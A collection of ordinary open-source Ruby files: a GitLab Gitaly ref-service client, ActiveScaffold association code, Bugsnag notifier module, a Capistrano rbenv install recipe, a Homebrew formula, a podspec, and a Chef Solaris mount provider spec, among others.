response = GitalyClient.call(@storage, :ref_service, :find_all_tag_names, request, timeout: GitalyClient.fast_timeout)
consume_refs_response(response) { |name| Gitlab::Git.tag_name(name) }
end
def find_ref_name(commit_id, ref_prefix)
request = Gitaly::FindRefNameRequest.new(
repository: @gitaly_repo,
commit_id: commit_id,
prefix: ref_prefix
)
response = GitalyClient.call(@storage, :ref_service, :find_ref_name, request, timeout: GitalyClient.medium_timeout)
encode!(response.name.dup)
end
def list_new_commits(newrev)
request = Gitaly::ListNewCommitsRequest.new(
repository: @gitaly_repo,
commit_id: newrev
)
commits = []
response = GitalyClient.call(@storage, :ref_service, :list_new_commits, request, timeout: GitalyClient.medium_timeout)
response.each do |msg|
msg.commits.each do |c|
commits << Gitlab::Git::Commit.new(@repository, c)
end
end
commits
end
def list_new_blobs(newrev, limit = 0, dynamic_timeout: nil)
request = Gitaly::ListNewBlobsRequest.new(
repository: @gitaly_repo,
commit_id: newrev,
limit: limit
)
timeout =
if dynamic_timeout
[dynamic_timeout, GitalyClient.medium_timeout].min
else
GitalyClient.medium_timeout
end
response = GitalyClient.call(@storage, :ref_service, :list_new_blobs, request, timeout: timeout)
response.flat_map do |msg|
# Returns an Array of Gitaly::NewBlobObject objects
# Available methods are: #size, #oid and #path
msg.new_blob_objects
end
end
def count_tag_names
tag_names.count
end
def count_branch_names
branch_names.count
end
def local_branches(sort_by: nil, pagination_params: nil)
request = Gitaly::FindLocalBranchesRequest.new(repository: @gitaly_repo, pagination_params: pagination_params)
request.sort_by = sort_by_param(sort_by) if sort_by
response = GitalyClient.call(@storage, :ref_service, :find_local_branches, request, timeout: GitalyClient.fast_timeout)
consume_find_local_branches_response(response)
end
def tags
request = Gitaly::FindAllTagsRequest.new(repository: @gitaly_repo)
response = GitalyClient.call(@storage, :ref_service, :find_all_tags, request, timeout: GitalyClient.medium_timeout)
consume_tags_response(response)
end
def ref_exists?(ref_name)
request = Gitaly::RefExistsRequest.new(repository: @gitaly_repo, ref: encode_binary(ref_name))
response = GitalyClient.call(@storage, :ref_service, :ref_exists, request, timeout: GitalyClient.fast_timeout)
response.value
rescue GRPC::InvalidArgument => e
raise ArgumentError, e.message
end
def find_branch(branch_name)
request = Gitaly::FindBranchRequest.new(
repository: @gitaly_repo,
name: encode_binary(branch_name)
)
response = GitalyClient.call(@repository.storage, :ref_service, :find_branch, request, timeout: GitalyClient.medium_timeout)
branch = response.branch
return unless branch
target_commit = Gitlab::Git::Commit.decorate(@repository, branch.target_commit)
Gitlab::Git::Branch.new(@repository, encode!(branch.name.dup), branch.target_commit.id, target_commit)
end
def delete_refs(refs: [], except_with_prefixes: [])
request = Gitaly::DeleteRefsRequest.new(
repository: @gitaly_repo,
refs: refs.map { |r| encode_binary(r) },
except_with_prefix: except_with_prefixes.map { |r| encode_binary(r) }
)
response = GitalyClient.call(@repository.storage, :ref_service, :delete_refs, request, timeout: GitalyClient.medium_timeout)
raise Gitlab::Git::Repository::GitError, response.git_error if response.git_error.present?
end
# Limit: 0 implies no limit, thus all tag names will be returned
def tag_names_contains_sha(sha, limit: 0)
request = Gitaly::ListTagNamesContainingCommitRequest.new(
repository: @gitaly_repo,
commit_id: sha,
limit: limit
)
response = GitalyClient.call(@storage, :ref_service, :list_tag_names_containing_commit, request, timeout: GitalyClient.medium_timeout)
consume_ref_contains_sha_response(response, :tag_names)
end
# Limit: 0 implies no limit, thus all tag names will be returned
def branch_names_contains_sha(sha, limit: 0)
request = Gitaly::ListBranchNamesContainingCommitRequest.new(
repository: @gitaly_repo,
commit_id: sha,
limit: limit
)
response = GitalyClient.call(@storage, :ref_service, :list_branch_names_containing_commit, request, timeout: GitalyClient.medium_timeout)
consume_ref_contains_sha_response(response, :branch_names)
end
def get_tag_messages(tag_ids)
request = Gitaly::GetTagMessagesRequest.new(repository: @gitaly_repo, tag_ids: tag_ids)
messages = Hash.new { |h, k| h[k] = +''.b }
current_tag_id = nil
response = GitalyClient.call(@storage, :ref_service, :get_tag_messages, request, timeout: GitalyClient.fast_timeout)
response.each do |rpc_message|
current_tag_id = rpc_message.tag_id if rpc_message.tag_id.present?
messages[current_tag_id] << rpc_message.message
end
messages
end
def pack_refs
request = Gitaly::PackRefsRequest.new(repository: @gitaly_repo)
GitalyClient.call(@storage, :ref_service, :pack_refs, request, timeout: GitalyClient.long_timeout)
end
private
def consume_refs_response(response)
response.flat_map { |message| message.names.map { |name| yield(name) } }
end
def sort_by_param(sort_by)
sort_by = 'name' if sort_by == 'name_asc'
enum_value = Gitaly::FindLocalBranchesRequest::SortBy.resolve(sort_by.upcase.to_sym)
raise ArgumentError, "Invalid sort_by key `#{sort_by}`" unless enum_value
enum_value
end
def consume_find_local_branches_response(response)
response.flat_map do |message|
message.branches.map do |gitaly_branch|
Gitlab::Git::Branch.new(
@repository,
encode!(gitaly_branch.name.dup),
gitaly_branch.commit_id,
commit_from_local_branches_response(gitaly_branch)
)
end
end
end
def consume_find_all_branches_response(response)
response.flat_map do |message|
message.branches.map do |branch|
target_commit = Gitlab::Git::Commit.decorate(@repository, branch.target)
Gitlab::Git::Branch.new(@repository, branch.name, branch.target.id, target_commit)
end
end
end
def consume_find_all_remote_branches_response(remote_name, response)
remote_name += '/' unless remote_name.ends_with?('/')
response.flat_map do |message|
message.branches.map do |branch|
target_commit = Gitlab::Git::Commit.decorate(@repository, branch.target_commit)
branch_name = branch.name.sub(remote_name, '')
Gitlab::Git::Branch.new(@repository, branch_name, branch.target_commit.id, target_commit)
end
end
end
def consume_tags_response(response)
response.flat_map do |message|
message.tags.map { |gitaly_tag| Gitlab::Git::Tag.new(@repository, gitaly_tag) }
end
end
def commit_from_local_branches_response(response)
# Git messages have no encoding enforcements. However, in the UI we only
# handle UTF-8, so basically we cross our fingers that the message force
# encoded to UTF-8 is readable.
message = response.commit_subject.dup.force_encoding('UTF-8')
# NOTE: For ease of parsing in Gitaly, we have only the subject of
# the commit and not the full message. This is ok, since all the
# code that uses `local_branches` only cares at most about the
# commit message.
# TODO: Once gitaly "takes over" Rugged consider separating the
# subject from the message to make it clearer when there's one
# available but not the other.
hash = {
id: response.commit_id,
message: message,
authored_date: Time.at(response.commit_author.date.seconds),
author_name: response.commit_author.name.dup,
author_email: response.commit_author.email.dup,
committed_date: Time.at(response.commit_committer.date.seconds),
committer_name: response.commit_committer.name.dup,
committer_email: response.commit_committer.email.dup
}
Gitlab::Git::Commit.decorate(@repository, hash)
end
def consume_ref_contains_sha_response(stream, collection_name)
stream.each_with_object([]) do |response, array|
encoded_names = response.send(collection_name).map { |b| Gitlab::Git.ref_name(b) } # rubocop:disable GitlabSecurity/PublicSend
array.concat(encoded_names)
end
end
def invalid_ref!(message)
raise Gitlab::Git::Repository::InvalidRef, message
end
end
end
end
| 38.97 | 145 | 0.673082 |
115b99c33fff5cbc0394aaf7aa308c4c24319d34 | 3,600 | module ActiveScaffold::DataStructures::Association
class Abstract
def initialize(association)
@association = association
end
attr_writer :reverse
delegate :name, :foreign_key, :==, to: :@association
def allow_join?
!polymorphic?
end
def klass
@association.klass unless polymorphic?
end
def belongs_to?
@association.macro == :belongs_to
end
def has_one?
@association.macro == :has_one
end
def has_many?
@association.macro == :has_many
end
def habtm?
@association.macro == :has_and_belongs_to_many
end
def singular?
!collection?
end
def through?
false
end
def polymorphic?
false
end
def readonly?
false
end
def through_reflection; end
def source_reflection; end
def scope; end
def respond_to_target?
false
end
def counter_cache_hack?
false
end
def quoted_table_name
raise "define quoted_table_name method in #{self.class.name} class"
end
def quoted_primary_key
raise "define quoted_primary_key method in #{self.class.name} class"
end
def reverse(klass = nil)
unless polymorphic? || defined?(@reverse)
@reverse ||= inverse || get_reverse&.name
end
@reverse || (get_reverse(klass)&.name unless klass.nil?)
end
def inverse_for?(klass)
inverse_class = reverse_association(klass)&.inverse_klass
inverse_class.present? && (inverse_class == klass || klass < inverse_class)
end
def reverse_association(klass = nil)
assoc = if polymorphic?
get_reverse(klass) unless klass.nil?
else
return unless reverse_name = reverse(klass)
reflect_on_association(reverse_name)
end
self.class.new(assoc) if assoc
end
protected
def reflect_on_association(name)
@association.klass.reflect_on_association(name)
end
def get_reverse(klass = nil)
return nil if klass.nil? && polymorphic?
# name-based matching (association name vs self.active_record.to_s)
matches = reverse_matches(klass || self.klass)
if matches.length > 1
matches.select! do |assoc|
inverse_klass.name.underscore.include? assoc.name.to_s.pluralize.singularize
end
end
matches.first
end
def reverse_matches(klass)
associations = self.class.reflect_on_all_associations(klass)
# collect associations that point back to this model and use the same foreign_key
associations.each_with_object([]) do |assoc, reverse_matches|
reverse_matches << assoc if reverse_match? assoc
end
end
def reverse_match?(assoc)
return false if assoc == @association
return false unless assoc.polymorphic? || assoc.class_name == inverse_klass&.name
if through?
reverse_through_match?(assoc)
elsif habtm?
reverse_habtm_match?(assoc)
else
reverse_direct_match?(assoc)
end
end
def reverse_through_match?(assoc); end
def reverse_habtm_match?(assoc)
assoc.macro == :has_and_belongs_to_many
end
def reverse_direct_match?(assoc)
# skip over has_and_belongs_to_many associations
return false if assoc.macro == :has_and_belongs_to_many
if foreign_key.is_a?(Array) || assoc.foreign_key.is_a?(Array) # composite_primary_keys
assoc.foreign_key == foreign_key
else
assoc.foreign_key.to_sym == foreign_key.to_sym
end
end
end
end
| 23.684211 | 92 | 0.655 |
623d64448d514bd407e21892a7fcb58ca7f2ec92 | 1,445 | class Kontena::Cli::GridCommand < Kontena::Command
subcommand ["list","ls"], "List all grids", load_subcommand('grids/list_command')
subcommand "create", "Create a new grid", load_subcommand('grids/create_command')
subcommand "update", "Update grid", load_subcommand('grids/update_command')
subcommand "use", "Switch to use specific grid", load_subcommand('grids/use_command')
subcommand "show", "Show grid details", load_subcommand('grids/show_command')
subcommand "logs", "Show logs from grid containers", load_subcommand('grids/logs_command')
subcommand "events", "Show events from grid", load_subcommand('grids/events_command')
subcommand ["remove","rm"], "Remove a grid", load_subcommand('grids/remove_command')
subcommand "current", "Show current grid details", load_subcommand('grids/current_command')
subcommand "env", "Show the current grid environment details", load_subcommand('grids/env_command')
subcommand "audit-log", "Show audit log of the current grid", load_subcommand('grids/audit_log_command')
subcommand "user", "User specific commands", load_subcommand('grids/user_command')
subcommand "cloud-config", "Generate cloud-config", load_subcommand('grids/cloud_config_command')
subcommand "trusted-subnet", "Trusted subnet related commands", load_subcommand('grids/trusted_subnet_command')
subcommand "health", "Check grid health", load_subcommand('grids/health_command')
def execute
end
end
| 65.681818 | 113 | 0.76955 |
5d2c6f3dbf20b4497a58d5557e965069d800dc42 | 435 | # vim: syntax=ruby:expandtab:shiftwidth=2:softtabstop=2:tabstop=2
#
# Copyright (c) 2016-present, Facebook, Inc.
# All rights reserved.
#
# This source code is licensed under the BSD-style license found in the
# LICENSE file in the root directory of this source tree. An additional grant
# of patent rights can be found in the PATENTS file in the same directory.
#
default['fb_hdparm'] = {
'enforce' => false,
'settings' => {},
}
| 29 | 77 | 0.724138 |
6a42567b69abd79e48541f127c409a3b9dc409ac | 6,712 | require "rubygems"
require "thread"
require "bugsnag/version"
require "bugsnag/configuration"
require "bugsnag/meta_data"
require "bugsnag/report"
require "bugsnag/cleaner"
require "bugsnag/helpers"
require "bugsnag/session_tracker"
require "bugsnag/delivery"
require "bugsnag/delivery/synchronous"
require "bugsnag/delivery/thread_queue"
# Rack is not bundled with the other integrations
# as it doesn't auto-configure when loaded
require "bugsnag/integrations/rack"
require "bugsnag/middleware/rack_request"
require "bugsnag/middleware/warden_user"
require "bugsnag/middleware/clearance_user"
require "bugsnag/middleware/callbacks"
require "bugsnag/middleware/rails3_request"
require "bugsnag/middleware/sidekiq"
require "bugsnag/middleware/mailman"
require "bugsnag/middleware/rake"
require "bugsnag/middleware/callbacks"
require "bugsnag/middleware/classify_error"
module Bugsnag
LOCK = Mutex.new
INTEGRATIONS = [:resque, :sidekiq, :mailman, :delayed_job, :shoryuken, :que]
class << self
##
# Configure the Bugsnag notifier application-wide settings.
#
# Yields a configuration object to use to set application settings.
def configure(validate_api_key=true)
yield(configuration) if block_given?
check_key_valid if validate_api_key
end
##
# Explicitly notify of an exception.
#
# Optionally accepts a block to append metadata to the yielded report.
def notify(exception, auto_notify=false, &block)
unless auto_notify.is_a? TrueClass or auto_notify.is_a? FalseClass
configuration.warn("Adding metadata/severity using a hash is no longer supported, please use block syntax instead")
auto_notify = false
end
if !configuration.auto_notify && auto_notify
configuration.debug("Not notifying because auto_notify is disabled")
return
end
if !configuration.valid_api_key?
configuration.debug("Not notifying due to an invalid api_key")
return
end
if !configuration.should_notify_release_stage?
configuration.debug("Not notifying due to notify_release_stages :#{configuration.notify_release_stages.inspect}")
return
end
if exception.respond_to?(:skip_bugsnag) && exception.skip_bugsnag
configuration.debug("Not notifying due to skip_bugsnag flag")
return
end
report = Report.new(exception, configuration, auto_notify)
# If this is an auto_notify we yield the block before the any middleware is run
yield(report) if block_given? && auto_notify
if report.ignore?
configuration.debug("Not notifying #{report.exceptions.last[:errorClass]} due to ignore being signified in auto_notify block")
return
end
# Run internal middleware
configuration.internal_middleware.run(report)
if report.ignore?
configuration.debug("Not notifying #{report.exceptions.last[:errorClass]} due to ignore being signified in internal middlewares")
return
end
# Store before_middleware severity reason for future reference
initial_severity = report.severity
initial_reason = report.severity_reason
# Run users middleware
configuration.middleware.run(report) do
if report.ignore?
configuration.debug("Not notifying #{report.exceptions.last[:errorClass]} due to ignore being signified in user provided middleware")
return
end
# If this is not an auto_notify then the block was provided by the user. This should be the last
# block that is run as it is the users "most specific" block.
yield(report) if block_given? && !auto_notify
if report.ignore?
configuration.debug("Not notifying #{report.exceptions.last[:errorClass]} due to ignore being signified in user provided block")
return
end
# Test whether severity has been changed and ensure severity_reason is consistant in auto_notify case
if report.severity != initial_severity
report.severity_reason = {
:type => Report::USER_CALLBACK_SET_SEVERITY
}
else
report.severity_reason = initial_reason
end
# Deliver
configuration.info("Notifying #{configuration.endpoint} of #{report.exceptions.last[:errorClass]}")
options = {:headers => report.headers}
payload = ::JSON.dump(Bugsnag::Helpers.trim_if_needed(report.as_json))
Bugsnag::Delivery[configuration.delivery_method].deliver(configuration.endpoint, payload, configuration, options)
end
end
##
# Returns the client's Configuration object, or creates one if not yet created.
def configuration
@configuration = nil unless defined?(@configuration)
@configuration || LOCK.synchronize { @configuration ||= Bugsnag::Configuration.new }
end
##
# Returns the client's SessionTracker object, or creates one if not yet created.
def session_tracker
@session_tracker = nil unless defined?(@session_tracker)
@session_tracker || LOCK.synchronize { @session_tracker ||= Bugsnag::SessionTracker.new}
end
##
# Starts a session.
#
# Allows Bugsnag to track error rates across releases.
def start_session
session_tracker.start_session
end
##
# Allow access to "before notify" callbacks as an array.
#
# These callbacks will be called whenever an error notification is being made.
def before_notify_callbacks
Bugsnag.configuration.request_data[:before_callbacks] ||= []
end
# Attempts to load all integrations through auto-discovery
def load_integrations
require "bugsnag/integrations/railtie" if defined?(Rails::Railtie)
INTEGRATIONS.each do |integration|
begin
require "bugsnag/integrations/#{integration}"
rescue LoadError
end
end
end
# Load a specific integration
def load_integration(integration)
integration = :railtie if integration == :rails
if INTEGRATIONS.include?(integration) || integration == :railtie
require "bugsnag/integrations/#{integration}"
else
configuration.debug("Integration #{integration} is not currently supported")
end
end
# Check if the API key is valid and warn (once) if it is not
def check_key_valid
@key_warning = false unless defined?(@key_warning)
if !configuration.valid_api_key? && !@key_warning
configuration.warn("No valid API key has been set, notifications will not be sent")
@key_warning = true
end
end
end
end
Bugsnag.load_integrations unless ENV["BUGSNAG_DISABLE_AUTOCONFIGURE"]
| 35.141361 | 143 | 0.706794 |
1c5f48977d3fd57d099bae12780534bec3a84660 | 1,852 | Capistrano::Configuration.instance(true).load do
set_default :ruby_version, "2.0.0-p195"
# set_default :rbenv_bootstrap, "bootstrap-ubuntu-11-10"
namespace :rbenv do
desc "Install rbenv, Ruby, and the Bundler gem"
task :install, roles: :app do
run "#{sudo} apt-get -y install curl git-core"
run "curl -L https://raw.github.com/fesplugas/rbenv-installer/master/bin/rbenv-installer | bash"
bashrc = <<-BASHRC
if [ -d $HOME/.rbenv ]; then
export PATH="$HOME/.rbenv/bin:$PATH"
eval "$(rbenv init -)"
fi
BASHRC
put bashrc, "/tmp/rbenvrc"
run "cat /tmp/rbenvrc ~/.bashrc > ~/.bashrc.tmp"
run "mv ~/.bashrc.tmp ~/.bashrc"
run %q{export PATH="$HOME/.rbenv/bin:$PATH"}
run %q{eval "$(rbenv init -)"}
run "#{sudo} apt-get -y install build-essential"
run "#{sudo} apt-get -y install zlib1g-dev libssl-dev"
run "#{sudo} apt-get -y install libreadline-gplv2-dev"
rbenv.install_ruby
run "gem install bundler --no-ri --no-rdoc"
run "rbenv rehash"
end
desc "Upgrade rbenv"
task :upgrade, roles: :app do
run "cd ~/.rbenv; git pull"
run "cd ~/.rbenv/plugins/ruby-build; git pull"
end
desc "Install ruby"
task :install_ruby, roles: :app do
run "export RUBY_GC_MALLOC_LIMIT=60000000; export RUBY_FREE_MIN=200000" #"; curl https://raw.github.com/gist/4637375/rbenv.sh | sh "
# run "curl https://raw.github.com/gist/1688857/2-#{ruby_version}-patched.sh > /tmp/#{ruby_version}-perf"
# run "rbenv install /tmp/#{ruby_version}-perf"
run "rbenv install -f #{ruby_version}"
run "rbenv global #{ruby_version}"
run "gem install bundler --no-ri --no-rdoc"
run "rbenv rehash"
end
after "cap_vps:prepare", "rbenv:install"
before "rbenv:install_ruby", "rbenv:upgrade"
end
end
| 36.313725 | 138 | 0.638769 |
21f1e34d400f74fd38f6b98b40571f373adb51ca | 1,280 | class Gocryptfs < Formula
desc "Encrypted overlay filesystem written in Go"
homepage "https://nuetzlich.net/gocryptfs/"
url "https://github.com/rfjakob/gocryptfs/releases/download/v2.0.1/gocryptfs_v2.0.1_src-deps.tar.gz"
sha256 "31be3f3a9400bd5eb8a4d5f86f7aee52a488207e12d312f2601ae08e7e26dd02"
license "MIT"
bottle do
sha256 cellar: :any_skip_relocation, x86_64_linux: "43d8cf09fcd4cb76ac51246225cd30c68ea4abe9c944843a9788534e09ea9e18"
end
depends_on "go" => :build
depends_on "pkg-config" => :build
depends_on "[email protected]"
on_macos do
disable! date: "2021-04-08", because: "requires closed-source macFUSE"
end
on_linux do
depends_on "libfuse"
end
def install
system "./build.bash"
bin.install "gocryptfs"
end
def caveats
on_macos do
<<~EOS
The reasons for disabling this formula can be found here:
https://github.com/Homebrew/homebrew-core/pull/64491
An external tap may provide a replacement formula. See:
https://docs.brew.sh/Interesting-Taps-and-Forks
EOS
end
end
test do
(testpath/"encdir").mkpath
pipe_output("#{bin}/gocryptfs -init #{testpath}/encdir", "password", 0)
assert_predicate testpath/"encdir/gocryptfs.conf", :exist?
end
end
| 27.234043 | 121 | 0.7125 |
621175fbbf95a3dcc99d27753e91811a3a74e8cb | 5,187 | #
# Be sure to run `pod spec lint NetworkTool.podspec' to ensure this is a
# valid spec and to remove all comments including this before submitting the spec.
#
# To learn more about Podspec attributes see http://docs.cocoapods.org/specification.html
# To see working Podspecs in the CocoaPods repo see https://github.com/CocoaPods/Specs/
#
Pod::Spec.new do |s|
# ――― Spec Metadata ―――――――――――――――――――――――――――――――――――――――――――――――――――――――――― #
#
# These will help people to find your library, and whilst it
# can feel like a chore to fill in it's definitely to your advantage. The
# summary should be tweet-length, and the description more in depth.
#
s.name = "NetworkTool"
s.version = "1.0.0"
s.summary = "Network tools."
# This description is used to generate tags and improve search results.
# * Think: What does it do? Why did you write it? What is the focus?
# * Try to keep it short, snappy and to the point.
# * Write the description between the DESC delimiters below.
# * Finally, don't worry about the indent, CocoaPods strips it!
s.description = <<-DESC
基于Alamofire、HandyJSON、RxSwift的网络工具
DESC
s.homepage = "https://coding.net/u/zhaofengYue/p/NetworkTool"
# s.screenshots = "www.example.com/screenshots_1.gif", "www.example.com/screenshots_2.gif"
# ――― Spec License ――――――――――――――――――――――――――――――――――――――――――――――――――――――――――― #
#
# Licensing your code is important. See http://choosealicense.com for more info.
# CocoaPods will detect a license file if there is a named LICENSE*
# Popular ones are 'MIT', 'BSD' and 'Apache License, Version 2.0'.
#
s.license = "MIT"
#s.license = { :type => "MIT", :file => "License" }
# ――― Author Metadata ――――――――――――――――――――――――――――――――――――――――――――――――――――――――― #
#
# Specify the authors of the library, with email addresses. Email addresses
# of the authors are extracted from the SCM log. E.g. $ git log. CocoaPods also
# accepts just a name if you'd rather not provide an email address.
#
# Specify a social_media_url where others can refer to, for example a twitter
# profile URL.
#
s.author = { "zhaofengYue" => "[email protected]" }
# Or just: s.author = "zhaofengYue"
# s.authors = { "zhaofengYue" => "[email protected]" }
# s.social_media_url = "http://twitter.com/zhaofengYue"
# ――― Platform Specifics ――――――――――――――――――――――――――――――――――――――――――――――――――――――― #
#
# If this Pod runs only on iOS or OS X, then specify the platform and
# the deployment target. You can optionally include the target after the platform.
#
s.platform = :ios, "8.0"
# s.platform = :ios, "5.0"
# When using multiple platforms
# s.ios.deployment_target = "5.0"
# s.osx.deployment_target = "10.7"
# s.watchos.deployment_target = "2.0"
# s.tvos.deployment_target = "9.0"
# ――― Source Location ―――――――――――――――――――――――――――――――――――――――――――――――――――――――――― #
#
# Specify the location from where the source should be retrieved.
# Supports git, hg, bzr, svn and HTTP.
#
s.source = { :git => "https://git.coding.net/zhaofengYue/NetworkTool.git", :tag => "#{s.version}" }
# ――― Source Code ―――――――――――――――――――――――――――――――――――――――――――――――――――――――――――――― #
#
# CocoaPods is smart about how it includes source code. For source files
# giving a folder will include any swift, h, m, mm, c & cpp files.
# For header files it will include any header in the folder.
# Not including the public_header_files will make all headers public.
#
s.source_files = "NetworkTool/NetworkTool/*.{swift,h,m}"
#s.exclude_files = "Classes/Exclude"
# s.public_header_files = "Classes/**/*.h"
# ――― Resources ―――――――――――――――――――――――――――――――――――――――――――――――――――――――――――――――― #
#
# A list of resources included with the Pod. These are copied into the
# target bundle with a build phase script. Anything else will be cleaned.
# You can preserve files from being cleaned, please don't preserve
# non-essential files like tests, examples and documentation.
#
# s.resource = "icon.png"
# s.resources = "Resources/*.png"
# s.preserve_paths = "FilesToSave", "MoreFilesToSave"
# ――― Project Linking ―――――――――――――――――――――――――――――――――――――――――――――――――――――――――― #
#
# Link your library with frameworks, or libraries. Libraries do not include
# the lib prefix of their name.
#
# s.framework = "SomeFramework"
# s.frameworks = "SomeFramework", "AnotherFramework"
# s.library = "iconv"
# s.libraries = "iconv", "xml2"
# ――― Project Settings ――――――――――――――――――――――――――――――――――――――――――――――――――――――――― #
#
# If your library depends on compiler flags you can set them in the xcconfig hash
# where they will only apply to your library. If you depend on other Podspecs
# you can include multiple dependencies to ensure it works.
s.requires_arc = true
# s.xcconfig = { "HEADER_SEARCH_PATHS" => "$(SDKROOT)/usr/include/libxml2" }
s.dependency "HandyJSON"
s.dependency "Alamofire"
s.dependency "RxCocoa"
s.dependency "RxSwift"
end
| 36.528169 | 107 | 0.597262 |
d56d06c853c3dfd74a579343bdd44836bd013499 | 594 | class ContactController < ApplicationController
def index
@contact = Contact.new
end
def new
@user = current_user
@contact = Contact.new
end
def create
@contact = Contact.new(params[:contact])
if @contact.valid?
render action: 'new'
end
end
def contact_send
@contact = Contact.new contact_params
ContactUsMailer.contact_us_email(@contact).deliver
redirect_to '/about', notice: "Your message was sent. Adventure is on its way!"
end
protected
def contact_params
params.require(:contact).permit(:name, :email, :message)
end
end | 21.214286 | 83 | 0.69697 |
386d6e737bde7e386cd68bdae26f8a41302f548c | 64 | module Sprockets
module Rails
VERSION = "3.1.1"
end
end
| 10.666667 | 21 | 0.65625 |
5d328c2edc27da0130a75d660e3ddc2e6223743a | 23,219 | #
# Author:: Lamont Granquist (<[email protected]>)
# Copyright:: Copyright (c) 2008-2014 Chef Software, Inc.
# License:: Apache License, Version 2.0
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
require 'spec_helper'
require 'ostruct'
# Do not run these tests on windows because some path handling
# code is not implemented to handle windows paths.
describe Chef::Provider::Mount::Solaris, :unix_only do
let(:node) { Chef::Node.new }
let(:events) { Chef::EventDispatch::Dispatcher.new }
let(:run_context) { Chef::RunContext.new(node, {}, events) }
let(:device_type) { :device }
let(:fstype) { "ufs" }
let(:device) { "/dev/dsk/c0t2d0s7" }
let(:mountpoint) { "/mnt/foo" }
let(:options) { nil }
let(:new_resource) {
new_resource = Chef::Resource::Mount.new(mountpoint)
new_resource.device device
new_resource.device_type device_type
new_resource.fstype fstype
new_resource.options options
new_resource.supports :remount => false
new_resource
}
let(:provider) {
Chef::Provider::Mount::Solaris.new(new_resource, run_context)
}
let(:vfstab_file_contents) {
<<-EOF.gsub /^\s*/, ''
#device device mount FS fsck mount mount
#to mount to fsck point type pass at boot options
#
fd - /dev/fd fd - no -
/proc - /proc proc - no -
# swap
/dev/dsk/c0t0d0s1 - - swap - no -
# root
/dev/dsk/c0t0d0s0 /dev/rdsk/c0t0d0s0 / ufs 1 no -
# tmpfs
swap - /tmp tmpfs - yes -
# nfs
cartman:/share2 - /cartman nfs - yes rw,soft
# ufs
/dev/dsk/c0t2d0s7 /dev/rdsk/c0t2d0s7 /mnt/foo ufs 2 yes -
EOF
}
let(:vfstab_file) {
t = Tempfile.new("rspec-vfstab")
t.write(vfstab_file_contents)
t.close
t
}
let(:mount_output) {
<<-EOF.gsub /^\s*/, ''
/dev/dsk/c0t0d0s0 on / type ufs read/write/setuid/intr/largefiles/xattr/onerror=panic/dev=2200000 on Tue Jul 31 22:34:46 2012
/dev/dsk/c0t2d0s7 on /mnt/foo type ufs read/write/setuid/intr/largefiles/xattr/onerror=panic/dev=2200007 on Tue Jul 31 22:34:46 2012
EOF
}
before do
stub_const("Chef::Provider::Mount::Solaris::VFSTAB", vfstab_file.path )
provider.stub(:shell_out!).with("mount -v").and_return(OpenStruct.new(:stdout => mount_output))
File.stub(:symlink?).with(device).and_return(false)
File.stub(:exist?).and_call_original # Tempfile.open on ruby 1.8.7 calls File.exist?
File.stub(:exist?).with(device).and_return(true)
File.stub(:exist?).with(mountpoint).and_return(true)
expect(File).to_not receive(:exists?)
end
describe "#define_resource_requirements" do
before do
# we're not testing the actual actions so stub them all out
[:mount_fs, :umount_fs, :remount_fs, :enable_fs, :disable_fs].each {|m| provider.stub(m) }
end
it "run_action(:mount) should raise an error if the device does not exist" do
File.stub(:exist?).with(device).and_return(false)
expect { provider.run_action(:mount) }.to raise_error(Chef::Exceptions::Mount)
end
it "run_action(:remount) should raise an error if the device does not exist" do
File.stub(:exist?).with(device).and_return(false)
expect { provider.run_action(:remount) }.to raise_error(Chef::Exceptions::Mount)
end
it "run_action(:mount) should raise an error if the mountpoint does not exist" do
File.stub(:exist?).with(mountpoint).and_return false
expect { provider.run_action(:mount) }.to raise_error(Chef::Exceptions::Mount)
end
it "run_action(:remount) should raise an error if the mountpoint does not exist" do
File.stub(:exist?).with(mountpoint).and_return false
expect { provider.run_action(:remount) }.to raise_error(Chef::Exceptions::Mount)
end
%w{tmpfs nfs ctfs proc mntfs objfs sharefs fd smbfs}.each do |ft|
context "when the device has a fstype of #{ft}" do
let(:fstype) { ft }
let(:device) { "something_that_is_not_a_file" }
before do
expect(File).to_not receive(:exist?).with(device)
end
it "run_action(:mount) should not raise an error" do
expect { provider.run_action(:mount) }.to_not raise_error
end
it "run_action(:remount) should not raise an error" do
expect { provider.run_action(:remount) }.to_not raise_error
end
end
end
end
describe "#load_current_resource" do
context "when loading a normal UFS filesystem" do
before do
provider.load_current_resource
end
it "should create a current_resource of type Chef::Resource::Mount" do
expect(provider.current_resource).to be_a(Chef::Resource::Mount)
end
it "should set the name on the current_resource" do
provider.current_resource.name.should == mountpoint
end
it "should set the mount_point on the current_resource" do
provider.current_resource.mount_point.should == mountpoint
end
it "should set the device on the current_resource" do
provider.current_resource.device.should == device
end
it "should set the device_type on the current_resource" do
provider.current_resource.device_type.should == device_type
end
it "should set the mounted status on the current_resource" do
expect(provider.current_resource.mounted).to be_true
end
it "should set the enabled status on the current_resource" do
expect(provider.current_resource.enabled).to be_true
end
it "should set the fstype field on the current_resource" do
expect(provider.current_resource.fstype).to eql("ufs")
end
it "should set the options field on the current_resource" do
expect(provider.current_resource.options).to eql(["-", "noauto"])
end
it "should set the pass field on the current_resource" do
expect(provider.current_resource.pass).to eql(2)
end
it "should not throw an exception when the device does not exist - CHEF-1565" do
File.stub(:exist?).with(device).and_return(false)
expect { provider.load_current_resource }.to_not raise_error
end
it "should not throw an exception when the mount point does not exist" do
File.stub(:exist?).with(mountpoint).and_return false
expect { provider.load_current_resource }.to_not raise_error
end
end
context "when the device is an smbfs mount" do
let(:mount_output) {
<<-EOF.gsub /^\s*/, ''
//solarsystem/tmp on /mnt type smbfs read/write/setuid/devices/dev=5080000 on Tue Mar 29 11:40:18 2011
EOF
}
let(:vfstab_file_contents) {
<<-EOF.gsub /^\s*/, ''
//WORKGROUP;username:password@host/share - /mountpoint smbfs - no fileperms=0777,dirperms=0777
EOF
}
it "should work at some point in the future" do
pending "SMBFS mounts on solaris look like they will need some future code work and more investigation"
end
end
context "when the device is an NFS mount" do
let(:mount_output) {
<<-EOF.gsub /^\s*/, ''
cartman:/share2 on /cartman type nfs rsize=32768,wsize=32768,NFSv4,dev=4000004 on Tue Mar 29 11:40:18 2011
EOF
}
let(:vfstab_file_contents) {
<<-EOF.gsub /^\s*/, ''
cartman:/share2 - /cartman nfs - yes rw,soft
EOF
}
let(:fstype) { "nfs" }
